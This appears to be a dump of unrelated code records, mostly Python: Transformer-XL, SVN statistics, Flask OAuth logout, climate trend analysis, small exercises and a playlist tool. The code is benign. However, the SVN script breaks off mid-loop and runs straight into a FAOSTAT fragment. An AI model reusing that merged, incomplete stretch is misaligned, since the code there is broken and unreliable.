1))(block_output)\n\n if i < num_block - 1:\n last_memory = Memory(\n batch_size=batch_size,\n memory_len=memory_len,\n target_len=target_len,\n output_dim=units,\n name='Memory-{}'.format(i + 1),\n )([block_output, memory_length_input])\n\n outputs.append(block_output)\n\n softmax = AdaptiveSoftmax(\n input_dim=units,\n output_dim=num_token,\n embed_dim=embed_dim,\n cutoffs=cutoffs,\n div_val=div_val,\n force_projection=force_projection,\n bind_embeddings=bind_embeddings,\n bind_projections=bind_projections,\n name='Softmax',\n )(outputs[-1:] + embedding_weights)\n\n model = keras.models.Model(inputs=inputs, outputs=softmax)\n return model\n","sub_path":"src/transformer_xl.py","file_name":"transformer_xl.py","file_ext":"py","file_size_in_byte":9465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"209523018","text":"#Create a Python dictionary that contains a bunch of fruits and their prices.\r\n#Write a program that checks if a certain fruit is available or not.\r\nfruit_dictionary =\t{\r\n \"Apple\": 120,\r\n \"Mango\": 200,\r\n \"Orange\": 50,\r\n \"Guava\": 50,\r\n \"Kiwi\": 200,\r\n \"Malta\": 500,\r\n \"Dragonfruit\": 300,\r\n \"Lichi\": 100\r\n}\r\nfruit = input(\"Enter a fruit name \")\r\nif (fruit in fruit_dictionary): #Checking fruit is available or not\r\n print(fruit +\" exists in the dictionary\")\r\nelse:\r\n print(fruit +\" doesn't exist in the dictionary\")","sub_path":"Python/Activities/Activity11.py","file_name":"Activity11.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"160492766","text":"import SVNDStatusUtil.SVNMonth\r\nimport Common.DateUtil\r\nimport Common.PropertiesUtil\r\nimport os\r\nimport Common.FTPUtil\r\nimport SVNDStatusUtil.SVN\r\nfrom Common import yaml_utill\r\nfrom Common.ReadFile import readFileReturnList\r\n\r\n\r\ndef clearNotNeeDictReplist(dictReplist):\r\n needNameList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n # print(\"needNameList=\",needNameList)\r\n for ele in 
dictReplist:\r\n for eleEle in list(ele.keys()):\r\n for eleEleEle in list(ele.get(eleEle).keys()):\r\n # print(\"eleEleEle=\",eleEleEle)\r\n # print(eleEleEle not in needNameList)\r\n if (eleEleEle not in needNameList) and (eleEleEle!=\"all\"):\r\n del ele.get(eleEle)[eleEleEle]\r\n return dictReplist\r\n\r\n\r\ndef clearNotNeedDictDevlist(dictDevlist):\r\n needNameList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n for ele in dictDevlist:\r\n for keys in list(ele.keys()):\r\n if (keys not in needNameList) and (keys !=\"all\"):\r\n del ele[keys]\r\n return dictDevlist\r\n\r\ndef getDevSum(dictDevlist):\r\n needNameList = Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\")\r\n devSum={}\r\n for name in needNameList:\r\n globals()[\"%sAllModifiedLines\"%name]=0\r\n for dict2 in dictDevlist:\r\n # print(\"dict2=\",dict2)\r\n for name in needNameList:\r\n try:\r\n globals()[\"%sAllModifiedLines\" % name]+=dict2.get(name)[0]\r\n except:\r\n globals()[\"%sAllModifiedLines\" % name] += 0\r\n for name in needNameList:\r\n devSum[name]= globals()[\"%sAllModifiedLines\" % name]\r\n return devSum\r\n\r\ndef get_yaml_name():\r\n person_list=[]\r\n teamdata=yaml_utill.get_yaml_data(\"../configs/teamconfig.yaml\")\r\n for team in teamdata:\r\n for person in team.get(\"person\"):\r\n person_list.append(person)\r\n teamdata=yaml_utill.get_yaml_data(\"../configs/departmentconfig.yaml\")\r\n for team in teamdata:\r\n for person in team.get(\"person\"):\r\n person_list.append(person)\r\n return set(person_list)\r\n\r\n\r\n\r\n\r\ndef getNeedAccount():\r\n SVNAccountList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\SVNAccount.txt\")\r\n excludeAccountList=Common.ReadFile.readFileReturnList(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\excludeAccount.txt\")\r\n # print(\"excludeAccountList=\",excludeAccountList)\r\n needAccountList=[]\r\n for name1 in SVNAccountList:\r\n # print(\"name1=\",name1)\r\n if name1 not in excludeAccountList:\r\n needAccountList.append(name1)\r\n # print(\"needAccountList=\",needAccountList)\r\n with open(os.path.dirname(os.getcwd()) + \"\\\\configs\\\\needAccounts.txt\",\"w\") as f:\r\n i=0\r\n while i latest_year:\n latest_year = year\n if rows is not None:\n rows.append(row)\n output_csv()\n return datasets, showcases\n","sub_path":"faostat.py","file_name":"faostat.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"540960169","text":"from flask import make_response\nfrom flask import session as login_session \nfrom ... import clearLoginSession \nimport httplib2\nimport json\n\nfrom . 
import mod_oauth2\n\n@mod_oauth2.route('/gdisconnect')\ndef gdisconnect():\n    access_token = login_session.get('access_token')\n    if access_token is None:\n        response = make_response(json.dumps(\n            'Current user not connected.'), 401)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    url = ('https://accounts.google.com/o/oauth2/revoke?token=%s'\n           % login_session['access_token'])\n    h = httplib2.Http()\n    result = h.request(url, 'GET')[0]\n    if result['status'] == '200':\n        del login_session['gplus_id']\n        del login_session['access_token']\n        clearLoginSession()\n        response = make_response(json.dumps(\n            'Successfully disconnected.'), 200)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n    else:\n        response = make_response(json.dumps(\n            'Failed to revoke token for given user.'), 400)\n        response.headers['Content-Type'] = 'application/json'\n        return response\n","sub_path":"app/views/mod_oauth2/gdisconnect.py","file_name":"gdisconnect.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"325970419","text":"# -*- coding: utf-8 -*-\n\n\n__all__ = ['anomaly', 'trend', 'trend_per_month', 'trend_mon_percentile',\n           'day_night_departures', 'correlate', 'covariance', 'resample_nanmean']\n#\n# global Variables\n#\nmonth_to_season = {1: 'DJF', 2: 'DJF', 3: 'MAM', 4: 'MAM', 5: 'MAM', 6: 'JJA', 7: 'JJA', 8: 'JJA', 9: 'SON',\n                   10: 'SON', 11: 'SON', 12: 'DJF'}\n\n\n#\n# # Counting and Selecting\n#\n\n\ndef select_period(data, dim='time', period=None):\n    from ..fun.cal import nanrange\n    from xarray import DataArray, Dataset\n\n    if not isinstance(data, (DataArray, Dataset)):\n        raise ValueError('requires an xarray DataArray, Dataset', type(data))\n\n    if dim not in data.dims:\n        raise ValueError(\"datetime dimension not found\")\n\n    if period is None:\n        data.attrs['period'] = '%d-%d' % nanrange(data[dim].dt.year.values)\n        return data\n    else:\n        iperiod = '%d-%d' % nanrange(data[dim].to_series()[period].index.year.values)\n        data = data.sel(**{dim: period})\n        data.attrs['period'] = iperiod\n        return data\n\n\ndef estimate_sample_size(data, ratio=0.6, freq='12h'):\n    \"\"\" Estimate the sample size from a timeseries, given freq and ratio\n\n    Args:\n        data (DataArray): Inputdata\n        ratio (float): percentage of dataset as ratio\n        freq (str): Pandas freq str\n\n    Returns:\n        int : Sample size according to freq and ratio\n    \"\"\"\n    import numpy as np\n    import pandas as pd\n    from xarray import DataArray\n    from ..fun import cal as fc\n\n    if not isinstance(data, DataArray):\n        raise ValueError(\"Requires a DataArray class object\")\n\n    date_dim = data.get_date_dimension()\n    dates = pd.DatetimeIndex(data.dims[date_dim])\n    axis = data.order.index(date_dim)\n    dates = pd.date_range(dates.min().replace(hour=np.min(dates.hour.values)),\n                          dates.max().replace(hour=np.max(dates.hour.values)), freq=freq)\n    years = fc.nanrange(dates.year)\n    print(\"Estimate Sample size (%d%%, F:%s): %d [%d : %d] %d %d\" % (\n        int(ratio * 100), freq, int(dates.size * ratio), years[0], years[1], np.diff(years) + 1, dates.size))\n    print(100 * data.apply(fc.nancount, axis=axis).to_pandas() / float(dates.size))\n    return int(dates.size * ratio)\n\n\n#\n# Climatology and Anomalies\n#\n\n\ndef climatology(data, dim='time', period=None, keep_attrs=True):\n    \"\"\"\n\n    Args:\n        data (DataArray): Input Data\n        dim (str): datetime dimension\n        period (slice): datetime selection\n        keep_attrs (bool) : xarray keep attributes\n    Returns:\n        
DataArray : Climate Monthly Means\n \"\"\"\n from xarray import DataArray, Dataset\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n data = select_period(data, dim=dim, period=period) # adds metadata and selects if not None\n return data.groupby(dim + '.month').mean(dim, keep_attrs=keep_attrs)\n\n\ndef anomaly(data, dim='time', period=None, keep_attrs=True):\n \"\"\" Calculates the anomaly from the climatology per month of a time series\n\n Args:\n data (DataArray) : Inputdata\n dim (str) : datetime dimension\n period (slice, str) : Indices of Dates for calculation\n keep_attrs (bool) : xarray keep attributes\n Returns:\n DataArray : Anomalies\n \"\"\"\n from xarray import DataArray, Dataset, set_options\n from ..fun.xarray import set_attrs\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n data = data.copy()\n # Calculate Climatology\n clim = climatology(data, dim=dim, period=period, keep_attrs=keep_attrs)\n # Calculate Anomaly\n with set_options(keep_attrs=keep_attrs):\n data = data.groupby(dim + '.month') - clim\n\n data = data.drop('month')\n if isinstance(data, Dataset):\n for ivar in data.data_vars:\n set_attrs(data[ivar], 'standard_name', add='_ano', default='anomaly')\n data[ivar].attrs['period'] = clim.attrs['period']\n else:\n set_attrs(data, 'standard_name', add='_ano', default='anomaly')\n data.attrs['period'] = clim.attrs['period']\n return data\n\n\n#\n# Trend Estimation\n#\n\n\ndef trend(data, dim='time', use_anomalies=True, period=None, min_periods=3, method='theil_sen',\n alpha=0.95, keep_attrs=True, only_slopes=False, **kwargs):\n \"\"\" Calculate Trend estimates\n\n Args:\n data (DataArray): input dataset array\n dim (str): datetime dimension\n use_anomalies (bool): calc. trends from anomalies (climatology removed)\n period (slice): time period for climatology\n min_periods (int): minimum number of values for trend estimate\n method (str): polyfit, theil_sen, linregress, lsq\n alpha (float): get confidence levels for that p value\n keep_attrs (bool): keep DataArray Attributes?\n only_slopes (bool): return only slopes (e.g. for Datasets)\n\n Returns:\n DataArray : trends\n \"\"\"\n import numpy as np\n from xarray import DataArray, Dataset\n from .. 
import fun as ff\n\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a DataArray class object\")\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n if method not in ['polyfit', 'theil_sen', 'linregress', 'lsq']:\n raise ValueError(\"Requires either polyfit, theil_sen, linregress or lsq\")\n\n if isinstance(data, Dataset):\n if use_anomalies:\n data = anomaly(data, dim=dim, period=period, keep_attrs=keep_attrs)\n\n out = {}\n for ivar in data.data_vars:\n out[ivar] = trend(data[ivar], dim=dim, use_anomalies=False, method=method, keep_attrs=keep_attrs,\n only_slopes=True)\n\n out = Dataset(out)\n out.attrs.update(data.attrs.copy())\n return out\n\n data = data.copy()\n per = np.timedelta64(1, 'D') / np.timedelta64(1, 'ns') # factor for trends\n axis = data.dims.index(dim)\n coords = {idim: data[idim].copy() for idim in data.dims if idim != dim}\n dimens = list(data.dims[:])\n dimens.remove(dim)\n attrs = data.attrs.copy()\n\n if use_anomalies:\n data = anomaly(data, dim=dim, period=period, keep_attrs=keep_attrs)\n attrs['period'] = data.attrs['period'] # copy\n\n # Convert to standard time axis\n idates = data[dim].values.astype('long') # Nano Seconds\n idates -= idates[0] # relative Times\n # Trends\n # k = [unit]/time\n params = ff.cal.linear_trend(data.values, idates, method=method, alpha=alpha, nmin=min_periods, axis=axis)\n # slope and intercept\n idx = [slice(None)] * params.ndim\n idx[axis] = 0 # slope\n slope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope', attrs=attrs)\n ff.xarray.set_attrs(slope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(slope, 'standard_name', add='_trend', default='trend')\n slope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n if only_slopes:\n return slope\n\n idx[axis] = 1 # slope\n interc = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='intercept', attrs=attrs)\n ff.xarray.set_attrs(interc, 'standard_name', add='_intercept', default='intercept')\n\n if params.shape[axis] > 2:\n if method == 'theil_sen':\n idx[axis] = 2 # slope lower\n aslope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope_min', attrs=attrs)\n ff.xarray.set_attrs(aslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(aslope, 'standard_name', add='_trend_min', default='trend_min')\n aslope.attrs['alpha'] = alpha\n aslope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n\n idx[axis] = 3 # slope upper\n bslope = DataArray(params[tuple(idx)] * per, coords=coords, dims=dimens, name='slope_max', attrs=attrs)\n ff.xarray.set_attrs(bslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(bslope, 'standard_name', add='_trend_max', default='trend_max')\n bslope.attrs['alpha'] = alpha\n bslope.attrs['cell_method'] = 'daily trend of anomalies' if use_anomalies else 'daily trend'\n\n return Dataset({'slope': slope, 'intercept': interc, 'lower': aslope, 'upper': bslope})\n\n # r_value, p_value, std_err\n idx[axis] = 2 # R-value\n rslope = DataArray(params[tuple(idx)] ** 2, coords=coords, dims=dimens, name='r_squared', attrs=attrs)\n rslope.attrs['units'] = '1'\n ff.xarray.set_attrs(rslope, 'standard_name', add='_r_squared', default='r_squared')\n\n idx[axis] = 3 # p-value\n bslope = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='p_value', attrs=attrs)\n bslope.attrs['units'] = '1'\n ff.xarray.set_attrs(bslope, 'standard_name', 
add='_p_value', default='p_value')\n bslope.attrs['cell_method'] = 'p-value for null hypothesis(slope==0)'\n\n idx[axis] = 4 # std err\n sslope = DataArray(params[tuple(idx)], coords=coords, dims=dimens, name='std_err', attrs=attrs)\n ff.xarray.set_attrs(sslope, 'units', add='/day', default='1/day')\n ff.xarray.set_attrs(sslope, 'standard_name', add='_std_err', default='std_err')\n sslope.attrs['cell_method'] = 'standard error of slope'\n\n return Dataset({'slope': slope, 'intercept': interc, 'r_squared': rslope, 'p_value': bslope, 'std_err': sslope})\n\n return Dataset({'slope': slope, 'intercept': interc})\n\n\ndef trend_mon_percentile(data, dim='time', percentile=None, period=None,\n min_periods=3, min_per_month=15, method='lsq', **kwargs):\n \"\"\" Monthly percentile trends\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n percentile (list): percentiles, int 1-99\n period (slice): datetime period for climatology\n min_periods (int): minimum values for trend\n min_per_month (int): minimum monthly count\n method (str): trend method\n **kwargs:\n\n Returns:\n Dataset : slope_perc_XX for each percentile\n \"\"\"\n import numpy as np\n from xarray import DataArray\n from .. import fun as ff\n if not isinstance(data, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if percentile is None:\n percentile = [25, 50, 75] # Quartils\n else:\n if any([iq < 1 for iq in percentile]):\n raise ValueError('Percentiles need to be integers [1, 99]')\n\n data = data.copy()\n axis = data.dims.index(dim)\n #\n # Call wrapper for nanpercentile -> add as new dimension\n #\n tmp = data.resample(**{dim: 'M'}).apply(ff.xarray.xarray_function_wrapper,\n wfunc=ff.cal.sample_wrapper,\n add_dim='prc',\n dim=dim,\n axis=axis,\n ffunc=np.nanpercentile,\n nmin=min_per_month,\n q=percentile)\n #\n # Call trend with\n #\n trends = trend(tmp, dim=dim, period=period, use_anomalies=False,\n min_periods=min_periods, method=method, only_slopes=True, **kwargs)\n #\n # Add metadata\n #\n ff.xarray.set_attrs(trends, 'standard_name', add='_perc', default='percentiles')\n trends.attrs['cell_method'] = 'daily trend of monthly percentiles'\n trends.attrs['min_per_month'] = min_per_month\n #\n # Assign Coordinate information\n #\n trends = trends.assign_coords({'prc': percentile})\n trends['prc'].attrs.update({'units': '%', 'standard_name': 'percentile'})\n return trends\n\n\ndef trend_per_month(data, dim='time', **kwargs):\n \"\"\" Trends per month\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n **kwargs:\n\n Returns:\n DataArray :\n \"\"\"\n from xarray import DataArray, Dataset\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError(\"Requires a xarray DataArray, Dataset\", type(data))\n\n if dim not in data.dims:\n raise ValueError(\"datetime dimension not found\")\n\n trends = data.groupby(dim + '.month').apply(trend, dim=dim, use_anomalies=False, **kwargs)\n return trends\n\n\n#\n# Correlations\n#\n\n\ndef correlate(x, y, dim='time', period=None, method='spearman', **kwargs):\n \"\"\" Correlation between Arrays\n\n Args:\n x (DataArray): input dataset\n y (DataArray): input dataset\n dim (str): datetime dimension\n period (slice): consider only that datetime period\n method (str): either spearman or pearson\n **kwargs:\n\n Returns:\n DataArray : correlation coefficients\n \"\"\"\n from xarray import DataArray, align\n from .. 
import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if not isinstance(y, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if method not in ['spearman', 'pearson']:\n raise ValueError('Only spearman or pearson allowed')\n\n if dim not in x.dims or dim not in y.dims:\n raise ValueError('Dimension must be present in both Arrays')\n\n x = select_period(x, dim=dim, period=period)\n # Align\n x, y = align(x, y, join='left')\n axis = x.dims.index(dim)\n\n # def sp_corr(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.spearman_correlation, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n #\n # def ps_corr(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.pearson_correlation, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n\n if method == 'spearman':\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.spearman_correlation, dim=dim, y=y, axis=axis)\n # corr = sp_corr(x, y, dim, axis)\n else:\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.pearson_correlation, dim=dim, y=y, axis=axis)\n # corr = ps_corr(x, y, dim, axis)\n\n ff.xarray.set_attrs(corr, 'standard_name', add='_corr', default='correlation')\n corr.attrs['units'] = '1'\n corr.attrs['cell_method'] = '%s correlation with %s' % (method, y.name)\n return corr\n\n\ndef covariance(x, y, dim='time', period=None):\n \"\"\" Covariance\n\n Args:\n x:\n y:\n dim:\n period:\n\n Returns:\n\n \"\"\"\n from xarray import DataArray, align\n from .. 
import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if not isinstance(y, DataArray):\n raise ValueError(\"Requires a DataArray class object\")\n\n if dim not in x.dims or dim not in y.dims:\n raise ValueError('Dimension must be present in both Arrays')\n\n x = select_period(x, dim=dim, period=period)\n # Align\n x, y = align(x, y, join='left')\n axis = x.dims.index(dim)\n\n # def nancov(xx, yy, d, a):\n # jdims = list(xx.dims)\n # jdims.remove(d)\n # return apply_ufunc(ff.cal.covariance, xx, yy,\n # input_core_dims=[xx.dims, yy.dims],\n # output_core_dims=[jdims],\n # output_dtypes=[float],\n # kwargs={'axis': a},\n # keep_attrs=True)\n #\n # corr = nancov(x, y, dim, axis)\n corr = ff.xarray.xarray_function_wrapper(x, wfunc=ff.cal.covariance, dim=dim, y=y, axis=axis)\n ff.xarray.set_attrs(corr, 'standard_name', add='_cov', default='covariance')\n ff.xarray.set_attrs(corr, 'units', add='2', default='2')\n ff.xarray.set_attrs(corr, 'cell_method', set='covariance with %s' % y.name)\n return corr\n\n\ndef day_night_departures(data, dim='time', day=12, night=0, **kwargs):\n \"\"\" Day-Night departures form dataset\n\n Args:\n data (DataArray): input dataset\n dim (str): datetime dimension\n day (int): hour of day: 12Z\n night (int): hour of night: 0Z\n **kwargs:\n\n Returns:\n\n \"\"\"\n from ..fun.xarray import set_attrs\n from .std import to_hours\n from xarray import DataArray, Dataset, set_options\n\n if not isinstance(data, (DataArray, Dataset)):\n raise ValueError('Requires a DataArray, Dataset', type(data))\n\n if dim not in data.dims:\n raise ValueError('Requires a datetime dimension', dim)\n\n data = to_hours(data, dim=dim, times=[day, night], **kwargs)\n attrs = data.attrs.copy()\n with set_options(keep_attrs=True):\n data = data.sel(hour=day) - data.sel(hour=night)\n data.attrs.update(attrs)\n if isinstance(data, DataArray):\n # data.name = data.name + '_dep'\n set_attrs(data, 'standard_name', add='_day_night_dep', default='day_night_departure')\n data.attrs['cell_method'] = 'noon - night'\n data.attrs['info'] = 'Day(%dZ)-Night(%dZ)' % (day, night)\n else:\n # data = data.rename({iname: iname + '_dep' for iname in data.data_vars})\n for iname in data.data_vars:\n set_attrs(data[iname], 'standard_name', add='_day_night_dep', default='day_night_dep')\n data[iname].attrs.update({'cell_method': 'noon - night', 'info': 'Day(%dZ)-Night(%dZ)' % (day, night)})\n return data\n\n\ndef statistics(x, f='rmse', y=None, dim='time', period=None, **kwargs):\n from xarray import DataArray\n from .. 
import fun as ff\n\n if not isinstance(x, DataArray):\n raise ValueError(\"Requires a DataArray, not\", type(x))\n\n if isinstance(f, str):\n try:\n f = getattr(ff.cal, f)\n except Exception as e:\n print('Function', f, 'not found in', ff.cal)\n raise e\n\n if period is not None:\n x = x.sel(**{dim: period})\n if y is not None:\n y = y.sel(**{dim: period})\n\n return ff.xarray.xarray_function_wrapper(x, wfunc=f, dim=dim, y=y, axis=x.dims.index(dim))\n\n\ndef resample_nanmean(data, dim='time', resample='M', nmin=15, **kwargs):\n \"\"\" Resample Dataset and apply a minimum for resampling mean\n\n Args:\n data (DataArray, Dataset): Input fields\n dim (str): datetime dimension\n resample (str): upsampling frequency\n nmin (int): minimum of samples per frequency\n **kwargs:\n\n Returns:\n DataArray, Dataset : means on freq\n \"\"\"\n import warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n dd = data.resample(**{dim: resample}).count(dim)\n return data.resample(**{dim: resample}).mean(dim).where(dd > nmin)\n\n#\n# def fill_missing_hours(data, dim='time', hour='hour', times=(0, 12), **kwargs):\n# import numpy as np\n# from pandas import Index\n# from xarray import DataArray, concat\n# from ..fun import message\n#\n# if not isinstance(data, DataArray):\n# raise ValueError()\n#\n# if dim not in data.coords.keys():\n# raise ValueError()\n# if hour not in data.coords.keys():\n# raise ValueError()\n#\n# if not np.isin(np.array(times), data[hour].values).all():\n# raise ValueError()\n#\n# #\n# # hours not 0, 12 -> fill in to\n# #\n# data = data.copy()\n# data = dict(data.groupby(hour))\n# for ikey, idata in data.items():\n# if ikey in times:\n# continue\n#\n# if ikey >= 18 or ikey < 6:\n# jkey = 0\n# else:\n# jkey = 12\n# #\n# # from earlier times ?\n# #\n# logic = np.isfinite(data[jkey].values)\n# data[jkey].values = np.where(logic, data[jkey].values, idata.values)\n# message(ikey, \" (%s)>(%s) %d\" % (\",\".join([\"%d\" % i for i in data.keys()]),\n# \",\".join([\"%d\" % i for i in times]),\n# sum(~logic & np.isfinite(idata.values)).sum()), **kwargs)\n# return concat([data[0], data[12]], dim=Index(times, name=hour, )).sortby(dim)\n","sub_path":"rasotools/met/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":20853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"241722657","text":"permut = input()\n\n\ndef repeticoes(permutacao):\n permutacao = permutacao.split()\n rep = []\n for i in range(len(permutacao)-1):\n for j in range(i+1, len(permutacao)):\n if permutacao[i] == permutacao[j]:\n rep.append(permutacao[j])\n return rep\n\n\ndef inverter(permutacao):\n permutacao = permutacao.split()\n perm = []\n for i in range(len(permutacao)-1, -1, -1):\n perm.append(permutacao[i])\n inv = \" \"\n return inv.join(perm)\n\n\ndef inversao(permutacao):\n permutacao = permutacao.split()\n inv = []\n qtd_inv = 0\n for i in range(len(permutacao)-1):\n for j in range(i+1, len(permutacao)):\n if int(permutacao[i]) > int(permutacao[j]):\n a = (i+1, j+1)\n inv.append(a)\n qtd_inv += 1\n return inv, qtd_inv\n\n\ndef diferenca(permutacao):\n inv = inverter(permutacao)\n inv = inv.split()\n permutacao = permutacao.split()\n dif = []\n for i in range(len(permutacao)):\n subtracao = int(permutacao[i]) - int(inv[i])\n dif.append(subtracao)\n return dif\n\n\nsaida = repeticoes(permut)\nsaida2, qtd = inversao(permut)\nsaida3 = inverter(permut)\nsaida4 = diferenca(permut)\n\nprint(f\"Os elementos que 
se repetem são: {saida}\")\nprint(f\"Há {qtd} inversões, e as posições são: {saida2}\")\nprint(f\"Sequência inversa: {saida3}\")\nprint(f\"A sequência obtida da diferença é: {saida4}\")\n\n","sub_path":"Ad2/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"62272687","text":"from marvin import ai_fn\n\n\n@ai_fn\ndef tag_text(text: str) -> list[str]:\n \"\"\"\n Apply zero or more tags to the text from the following:\n - happy\n - polite\n - question\n - angry\n - confused\n - needs help\n - urgent\n - meme\n\n \"\"\"\n\n\ntag_text(\"i can has cheezburger?\") # ['question', 'meme']\ntag_text(\"can you help me please?\") # ['polite', 'question', 'needs help']\ntag_text(\"i need help YESTERDAY\") # ['needs help', 'urgent']\n","sub_path":"examples/ai_functions/tag_text.py","file_name":"tag_text.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"93604466","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport loader\nimport iters\n\n\ndef output_playlist(path: str, playlist, ext=\"pls\"):\n for hour, tracks in playlist.items():\n file_name = os.path.join(path, \"{:02}.{}\".format(hour, ext))\n with open(file_name, mode=\"w\") as fp:\n for track in tracks:\n print(track.as_entry(), file=fp)\n\n\ndef prepend_base(base: str, path: str) -> str:\n if not base or os.path.isabs(path):\n return path\n return os.path.join(base, path)\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", default=\"splist_config.json\", help=\"Configuration file.\")\n args = parser.parse_args()\n\n try:\n with open(args.config, mode=\"r\") as fp:\n config = json.load(fp)\n except IOError as err:\n print(\"Can not load config ({})\".format(err), file=sys.stderr)\n return 1\n # Check config version\n if config.get(\"version\", 1) != 2:\n print(\"Old configuration format detected, please upgrade configuration.\", file=sys.stderr)\n return 3\n\n try:\n tracks = loader.load_tracks(config[\"tracks\"])\n except IOError as err:\n print(\"Error while loading tracks ({})\".format(err), file=sys.stderr)\n return 4\n tr_iters = [i for i in tracks.values() if isinstance(i, iters.TimeRange)]\n tpl_pl = iters.TemplatePlaylist(config[\"hour_template\"], tracks)\n current_duration = 0.0\n current_hour = 0\n playlist = {}\n\n for i in tr_iters:\n i.set_time(0)\n for track in tpl_pl:\n if current_hour not in playlist:\n playlist[current_hour] = []\n playlist[current_hour].append(track)\n current_duration += track.duration\n if current_duration >= 3600.0:\n current_duration = 0.0\n current_hour += 1\n for i in tr_iters:\n i.set_time(current_hour * 3600)\n tpl_pl.rewind()\n if current_hour > 23:\n break\n try:\n output_playlist(\n prepend_base(config.get(\"base_path\"), config[\"output\"]),\n playlist,\n config.get(\"ext\", \"pls\")\n )\n except IOError as err:\n print(\"Can not output playlist ({}).\".format(err))\n return 3\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"splist.py","file_name":"splist.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"253575278","text":"import pandas as pd\nimport glob\nimport os\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\npath = 
'/home/hrituraj/Desktop/Internship/PressNotes/geomedia/Geomedia_extract_AGENDA/Geomedia_extract_AGENDA/'\n\n\nframe = pd.DataFrame()\n#Db = pd.read_csv('en_IND_hindti_int/rss_unique_TAG_country_Ebola.csv', error_bad_lines = False, sep ='\\t')\nAllFiles = []\ndf = pd.DataFrame()\n\nfor directory in os.listdir(path):\n if os.path.isdir(path + '/' + directory):\n new_path = path + '/' + directory\n db = pd.read_csv(new_path + '/' + \"rss_unique_TAG_country_Ebola.csv\",error_bad_lines = False,sep ='\\t')\n AllFiles.append(db)\n \n \ndf = pd.concat(AllFiles)\n\ndf['feed'] = df['feed'].astype(str).str[3:6]\nnew_df = df[['feed','TAG_country']].dropna()\nfinal_df = new_df.groupby(['feed','TAG_country']).size().reset_index(name = 'Weight')\n\nG = nx.Graph()\nG = nx.from_pandas_dataframe(final_df,'feed','TAG_country','Weight')\n\nnx.draw_random(G)\nplt.figure(1,figsize=(120,120)) \nplt.show()\nplt.savefig('graph.pdf')\nplt.hold()\n\n\n\n\n\n\n","sub_path":"Get_Data.py","file_name":"Get_Data.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"16724409","text":"#!/usr/bin/env python\n\n\"\"\"\nA demo app and wrapper around the implemented classes,\nacting as the entry point for the developer exercise solution.\n\nThis program needs the 